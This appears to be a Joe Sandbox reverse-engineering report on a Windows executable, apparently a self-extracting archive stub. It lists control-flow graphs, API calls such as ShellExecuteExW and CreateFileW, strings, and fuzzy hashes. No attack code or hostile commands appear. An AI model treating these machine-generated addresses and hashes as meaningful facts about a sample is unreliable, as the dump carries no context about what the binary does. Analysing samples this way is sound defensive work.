                    • Instruction ID: 5e6cdf34ea0c83e3cff1c6543dfe550edcd9ca3fafc50a91df4dc4c279864767
                    • Opcode Fuzzy Hash: 2d3c886514e535562a315ce7ded86581f85cac6993193cd8643d2456eb227119
                    • Instruction Fuzzy Hash: 5C316971200212AFD7259F61ED88E2BBFE8EF84751B05466AF919D3260EF31DC41CEA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 847 b7e8df-b7e8f7 call b7ffd0 850 b7e8fd-b7e909 call b84fa3 847->850 851 b7eb38-b7eb40 847->851 850->851 854 b7e90f-b7e937 call b811b0 850->854 857 b7e941-b7e94f 854->857 858 b7e939 854->858 859 b7e962-b7e968 857->859 860 b7e951-b7e954 857->860 858->857 862 b7e9ab-b7e9ae 859->862 861 b7e958-b7e95e 860->861 863 b7e987-b7e994 861->863 864 b7e960 861->864 862->861 865 b7e9b0-b7e9b6 862->865 867 b7eb10-b7eb12 863->867 868 b7e99a-b7e99e 863->868 866 b7e972-b7e97c 864->866 869 b7e9bd-b7e9bf 865->869 870 b7e9b8-b7e9bb 865->870 871 b7e97e 866->871 872 b7e96a-b7e970 866->872 873 b7eb16 867->873 868->873 874 b7e9a4-b7e9a9 868->874 875 b7e9d2-b7e9e8 call b6cd5c 869->875 876 b7e9c1-b7e9c8 869->876 870->869 870->875 871->863 872->866 879 b7e980-b7e983 872->879 881 b7eb1f 873->881 874->862 882 b7ea01-b7ea0c call b6b4c1 875->882 883 b7e9ea-b7e9f7 call b73316 875->883 876->875 877 b7e9ca 876->877 877->875 879->863 884 b7eb26-b7eb28 881->884 893 b7ea0e-b7ea25 call b6cad4 882->893 894 b7ea29-b7ea36 ShellExecuteExW 882->894 883->882 892 b7e9f9 883->892 887 b7eb37 884->887 888 b7eb2a-b7eb2c 884->888 887->851 888->887 891 b7eb2e-b7eb31 ShowWindow 888->891 891->887 892->882 893->894 894->887 896 b7ea3c-b7ea49 894->896 897 b7ea5c-b7ea5e 896->897 898 b7ea4b-b7ea52 896->898 901 b7ea75-b7ea94 call b7ed8b 897->901 902 b7ea60-b7ea69 897->902 898->897 900 b7ea54-b7ea5a 898->900 900->897 903 b7eacb-b7ead7 CloseHandle 900->903 901->903 916 b7ea96-b7ea9e 901->916 902->901 910 b7ea6b-b7ea73 ShowWindow 902->910 904 b7ead9-b7eae6 call b73316 903->904 905 b7eae8-b7eaf6 903->905 904->881 904->905 905->884 909 b7eaf8-b7eafa 905->909 909->884 913 b7eafc-b7eb02 909->913 910->901 913->884 915 b7eb04-b7eb0e 913->915 915->884 916->903 917 b7eaa0-b7eab1 GetExitCodeProcess 916->917 917->903 918 b7eab3-b7eabd 917->918 919 b7eac4 918->919 920 b7eabf 918->920 919->903 920->919
                    APIs
                    • _wcslen.LIBCMT ref: 00B7E8FE
                    • ShellExecuteExW.SHELL32(?), ref: 00B7EA2E
                    • ShowWindow.USER32(?,00000000), ref: 00B7EA6D
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00B7EAA9
                    • CloseHandle.KERNEL32(?), ref: 00B7EACF
                    • ShowWindow.USER32(?,00000001), ref: 00B7EB31
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                    • String ID: .exe$.inf
                    • API String ID: 36480843-3750412487
                    • Opcode ID: 92baa1a3e37429c83bee0a61d94cbdf0509ec60ea246323e5c3fa188a9b7a440
                    • Instruction ID: 548f3653682a5a7ff17802c60d7189c4039baa749598e3ba26a7f180c425ada7
                    • Opcode Fuzzy Hash: 92baa1a3e37429c83bee0a61d94cbdf0509ec60ea246323e5c3fa188a9b7a440
                    • Instruction Fuzzy Hash: 7751E6310043809ADB309B249884ABB7BE5FF4D744F0488DDF5F9A72A1EB71D985D752

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 921 b8bb1b-b8bb34 922 b8bb4a-b8bb4f 921->922 923 b8bb36-b8bb46 call b9010c 921->923 925 b8bb5c-b8bb80 MultiByteToWideChar 922->925 926 b8bb51-b8bb59 922->926 923->922 930 b8bb48 923->930 928 b8bd13-b8bd26 call b80d7c 925->928 929 b8bb86-b8bb92 925->929 926->925 931 b8bb94-b8bba5 929->931 932 b8bbe6 929->932 930->922 935 b8bbc4-b8bbd5 call b8a7fe 931->935 936 b8bba7-b8bbb6 call b931d0 931->936 934 b8bbe8-b8bbea 932->934 938 b8bd08 934->938 939 b8bbf0-b8bc03 MultiByteToWideChar 934->939 935->938 946 b8bbdb 935->946 936->938 949 b8bbbc-b8bbc2 936->949 944 b8bd0a-b8bd11 call b8bd83 938->944 939->938 943 b8bc09-b8bc1b call b8c12c 939->943 951 b8bc20-b8bc24 943->951 944->928 950 b8bbe1-b8bbe4 946->950 949->950 950->934 951->938 953 b8bc2a-b8bc31 951->953 954 b8bc6b-b8bc77 953->954 955 b8bc33-b8bc38 953->955 956 b8bc79-b8bc8a 954->956 957 b8bcc3 954->957 955->944 958 b8bc3e-b8bc40 955->958 959 b8bc8c-b8bc9b call b931d0 956->959 960 b8bca5-b8bcb6 call b8a7fe 956->960 961 b8bcc5-b8bcc7 957->961 958->938 962 b8bc46-b8bc60 call b8c12c 958->962 966 b8bd01-b8bd07 call b8bd83 959->966 973 b8bc9d-b8bca3 959->973 960->966 975 b8bcb8 960->975 965 b8bcc9-b8bce2 call b8c12c 961->965 961->966 962->944 977 b8bc66 962->977 965->966 978 b8bce4-b8bceb 965->978 966->938 979 b8bcbe-b8bcc1 973->979 975->979 977->938 980 b8bced-b8bcee 978->980 981 b8bd27-b8bd2d 978->981 979->961 982 b8bcef-b8bcff WideCharToMultiByte 980->982 981->982 982->966 983 b8bd2f-b8bd36 call b8bd83 982->983 983->944
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B86B09,00B86B09,?,?,?,00B8BD6C,00000001,00000001,62E85006), ref: 00B8BB75
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B8BD6C,00000001,00000001,62E85006,?,?,?), ref: 00B8BBFB
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B8BCF5
                    • __freea.LIBCMT ref: 00B8BD02
                      • Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830
                    • __freea.LIBCMT ref: 00B8BD0B
                    • __freea.LIBCMT ref: 00B8BD30
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: 906f2b150d53d048e68d7a5bad39bc48cd44dc23a61bf3a5c93897cec21cc293
                    • Instruction ID: 21eddd246b42a8d7134cad7f4db69811c1cb2c1750aaca92db358cba0e93a8c9
                    • Opcode Fuzzy Hash: 906f2b150d53d048e68d7a5bad39bc48cd44dc23a61bf3a5c93897cec21cc293
                    • Instruction Fuzzy Hash: 7651C07261021AAAEF25AF74CC81EAB7BE9EF44750F1546A9FC04E6160DB34DC41C760

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
                      • Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78
                    • OleInitialize.OLE32(00000000), ref: 00B7BD34
                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7BD6B
                    • SHGetMalloc.SHELL32(00BAA460), ref: 00B7BD75
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                    • String ID: riched20.dll$3Uo
                    • API String ID: 3498096277-2552611257
                    • Opcode ID: 7d99f2f0e49b61fe5154c6472f36521dbe590de94b1d791613398b7780d9c9c2
                    • Instruction ID: 0df4fcf445aa9e887f8a89d7f6372f2bf9e8f6cce2a4fef69a88ba447b9ac1db
                    • Opcode Fuzzy Hash: 7d99f2f0e49b61fe5154c6472f36521dbe590de94b1d791613398b7780d9c9c2
                    • Instruction Fuzzy Hash: BDF0F9B1D00209ABCB20AF99D849DEFFFFCEF84704F00846AE415E2250DBB456458BA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 990 b6ab40-b6ab61 call b7ffd0 993 b6ab63-b6ab66 990->993 994 b6ab6c 990->994 993->994 995 b6ab68-b6ab6a 993->995 996 b6ab6e-b6ab7f 994->996 995->996 997 b6ab87-b6ab91 996->997 998 b6ab81 996->998 999 b6ab96-b6aba3 call b679e5 997->999 1000 b6ab93 997->1000 998->997 1003 b6aba5 999->1003 1004 b6abab-b6abca CreateFileW 999->1004 1000->999 1003->1004 1005 b6abcc-b6abee GetLastError call b6cf32 1004->1005 1006 b6ac1b-b6ac1f 1004->1006 1010 b6ac28-b6ac2d 1005->1010 1012 b6abf0-b6ac13 CreateFileW GetLastError 1005->1012 1008 b6ac23-b6ac26 1006->1008 1008->1010 1011 b6ac39-b6ac3e 1008->1011 1010->1011 1013 b6ac2f 1010->1013 1014 b6ac40-b6ac43 1011->1014 1015 b6ac5f-b6ac70 1011->1015 1012->1008 1018 b6ac15-b6ac19 1012->1018 1013->1011 1014->1015 1019 b6ac45-b6ac59 SetFileTime 1014->1019 1016 b6ac72-b6ac8a call b7192f 1015->1016 1017 b6ac8e-b6ac99 1015->1017 1016->1017 1018->1008 1019->1015
                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B68243,?,00000005,?,00000011), ref: 00B6ABBF
                    • GetLastError.KERNEL32(?,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6ABCC
                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B68243,?,00000005,?), ref: 00B6AC02
                    • GetLastError.KERNEL32(?,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6AC0A
                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B68243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6AC59
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast$Time
                    • String ID:
                    • API String ID: 1999340476-0
                    • Opcode ID: 469e8c9952bc3b42fd402ee0aedc3c24a2cca295a3d34aba50e8024896f8a11e
                    • Instruction ID: f890f13f608cb20bc7e3dd75afde02d2a1e4493abfa3228bdcde96e886c506fd
                    • Opcode Fuzzy Hash: 469e8c9952bc3b42fd402ee0aedc3c24a2cca295a3d34aba50e8024896f8a11e
                    • Instruction Fuzzy Hash: D93155305447816FEB309F24CD45BDABBD4FB06320F100B59F6A0A61C1C7B9A895CF96

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1049 b7c758-b7c771 PeekMessageW 1050 b7c773-b7c787 GetMessageW 1049->1050 1051 b7c7ac-b7c7ae 1049->1051 1052 b7c789-b7c796 IsDialogMessageW 1050->1052 1053 b7c798-b7c7a6 TranslateMessage DispatchMessageW 1050->1053 1052->1051 1052->1053 1053->1051
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
                    • IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
                    • TranslateMessage.USER32(?), ref: 00B7C79C
                    • DispatchMessageW.USER32(?), ref: 00B7C7A6
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchPeekTranslate
                    • String ID:
                    • API String ID: 1266772231-0
                    • Opcode ID: 22d576e009d813be4e2a32fa1545bbdd142c83e1f64b926ce8b4d31456c11ccf
                    • Instruction ID: 0ec7ebbc52bd04d541901a457dd86df16773c232daf11238ff2d03b54384bf80
                    • Opcode Fuzzy Hash: 22d576e009d813be4e2a32fa1545bbdd142c83e1f64b926ce8b4d31456c11ccf
                    • Instruction Fuzzy Hash: C4F0DAB190162AAB8B30ABA6EC4CDDF7FACEE093917408419B51AD3110EF64E545CBF0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1054 b7bbc0-b7bbdf GetClassNameW 1055 b7bc07-b7bc09 1054->1055 1056 b7bbe1-b7bbf6 call b73316 1054->1056 1058 b7bc14-b7bc16 1055->1058 1059 b7bc0b-b7bc0e SHAutoComplete 1055->1059 1061 b7bc06 1056->1061 1062 b7bbf8-b7bc04 FindWindowExW 1056->1062 1059->1058 1061->1055 1062->1061
                    APIs
                    • GetClassNameW.USER32(?,?,00000050), ref: 00B7BBD7
                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B7BC0E
                      • Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C
                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B7BBFE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                    • String ID: EDIT
                    • API String ID: 4243998846-3080729518
                    • Opcode ID: c34bd77ff3f59cae299db936b96aac51829069c8f952cc76fe7fe77efc05803b
                    • Instruction ID: 15d330e8762513d452748f4a9ad23e5c97eb062f2d7e2a199cdf044ce4fb97d2
                    • Opcode Fuzzy Hash: c34bd77ff3f59cae299db936b96aac51829069c8f952cc76fe7fe77efc05803b
                    • Instruction Fuzzy Hash: F6F082726006287ADB3156659C0AF9F76ACEB56B40F4480A1B904F7180DB64EA418AF9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1063 b7ed2e-b7ed59 call b7ffd0 SetEnvironmentVariableW call b7169e 1067 b7ed5e-b7ed62 1063->1067 1068 b7ed86-b7ed88 1067->1068 1069 b7ed64-b7ed68 1067->1069 1070 b7ed71-b7ed78 call b717ba 1069->1070 1073 b7ed6a-b7ed70 1070->1073 1074 b7ed7a-b7ed80 SetEnvironmentVariableW 1070->1074 1073->1070 1074->1068
                    APIs
                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B7ED44
                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7ED80
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: EnvironmentVariable
                    • String ID: sfxcmd$sfxpar
                    • API String ID: 1431749950-3493335439
                    • Opcode ID: 6525d6bf228c66762a86aa0299236627210ac6c8ac6b63850b453bf98f15fd52
                    • Instruction ID: 7c49af8683b54a863768617b848d7f845651afe2e92ef894e2a9ac5818bb9815
                    • Opcode Fuzzy Hash: 6525d6bf228c66762a86aa0299236627210ac6c8ac6b63850b453bf98f15fd52
                    • Instruction Fuzzy Hash: 60F0EC7140123067CB312B948C15EBA7BD8DF19B41B0080E1FC6D76051EB60CC40D6B0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1075 b84da2-b84db7 LoadLibraryExW 1076 b84db9-b84dc2 GetLastError 1075->1076 1077 b84deb-b84dec 1075->1077 1078 b84de9 1076->1078 1079 b84dc4-b84dd8 call b87468 1076->1079 1078->1077 1079->1078 1082 b84dda-b84de8 LoadLibraryExW 1079->1082
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00B84D53,00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx), ref: 00B84DAF
                    • GetLastError.KERNEL32(?,00B84D53,00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx,00000000,?,00B84CAD), ref: 00B84DB9
                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00B83BF3), ref: 00B84DE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: b504e5f0d18b6910d6166c4165dabfdcd7806b582ba4e1efa5c88ad219e8efbc
                    • Instruction ID: e966ef66ea8f622cc2b0854d0fcdeba11772c5171534fb7fb429b3683e130904
                    • Opcode Fuzzy Hash: b504e5f0d18b6910d6166c4165dabfdcd7806b582ba4e1efa5c88ad219e8efbc
                    • Instruction Fuzzy Hash: 34E01A38285205B7EE102FA1ED46F593FD8AB11B55F1400B1FA0CA80F0EB61A951D784

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1083 b6a9e5-b6a9f1 1084 b6a9f3-b6a9fb GetStdHandle 1083->1084 1085 b6a9fe-b6aa15 ReadFile 1083->1085 1084->1085 1086 b6aa17-b6aa20 call b6ab1c 1085->1086 1087 b6aa71 1085->1087 1091 b6aa22-b6aa2a 1086->1091 1092 b6aa39-b6aa3d 1086->1092 1089 b6aa74-b6aa77 1087->1089 1091->1092 1095 b6aa2c 1091->1095 1093 b6aa4e-b6aa52 1092->1093 1094 b6aa3f-b6aa48 GetLastError 1092->1094 1097 b6aa54-b6aa5c 1093->1097 1098 b6aa6c-b6aa6f 1093->1098 1094->1093 1096 b6aa4a-b6aa4c 1094->1096 1099 b6aa2d-b6aa37 call b6a9e5 1095->1099 1096->1089 1097->1098 1101 b6aa5e-b6aa67 GetLastError 1097->1101 1098->1089 1099->1089 1101->1098 1103 b6aa69-b6aa6a 1101->1103 1103->1099
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00B6A9F5
                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B6AA0D
                    • GetLastError.KERNEL32 ref: 00B6AA3F
                    • GetLastError.KERNEL32 ref: 00B6AA5E
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorLast$FileHandleRead
                    • String ID:
                    • API String ID: 2244327787-0
                    • Opcode ID: e51ab6d9b35e3dc4cfc2e49ea04ca864510b672102ada1691caf4f20feb6ceaf
                    • Instruction ID: 10fbebb7df8807cbe8b24dff34ea405b64222368bf72285549c97cadfef74a65
                    • Opcode Fuzzy Hash: e51ab6d9b35e3dc4cfc2e49ea04ca864510b672102ada1691caf4f20feb6ceaf
                    • Instruction Fuzzy Hash: DA117C35500204EBCF209FA0DA44A6A37E9FB02364F2046ABF516A6190DB7CEE45DF53
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B853FD,00000000,00000000,?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue), ref: 00B8BF26
                    • GetLastError.KERNEL32(?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue,00B98A00,FlsSetValue,00000000,00000364,?,00B8A5E7), ref: 00B8BF32
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B8BE9B,00B853FD,00000000,00000000,00000000,?,00B8C098,00000006,FlsSetValue,00B98A00,FlsSetValue,00000000), ref: 00B8BF40
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 46b3c8f7a80283925b9a68844ec24b59141dc6ba6e756103958e79e76b974c1d
                    • Instruction ID: 07c6787c85360677833d2acefa0e0389ac55f0cf4e5dc0f895afccf4a5da83e1
                    • Opcode Fuzzy Hash: 46b3c8f7a80283925b9a68844ec24b59141dc6ba6e756103958e79e76b974c1d
                    • Instruction Fuzzy Hash: A601A7326152269BCB215B78EC84E5777D8EF06BA17150665FA1AD7260DB20D801CBE0
                    APIs
                    • CreateThread.KERNELBASE(00000000,00010000,Function_00012480,?,00000000,00000000), ref: 00B72362
                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00B723A9
                      • Part of subcall function 00B676E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B67707
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
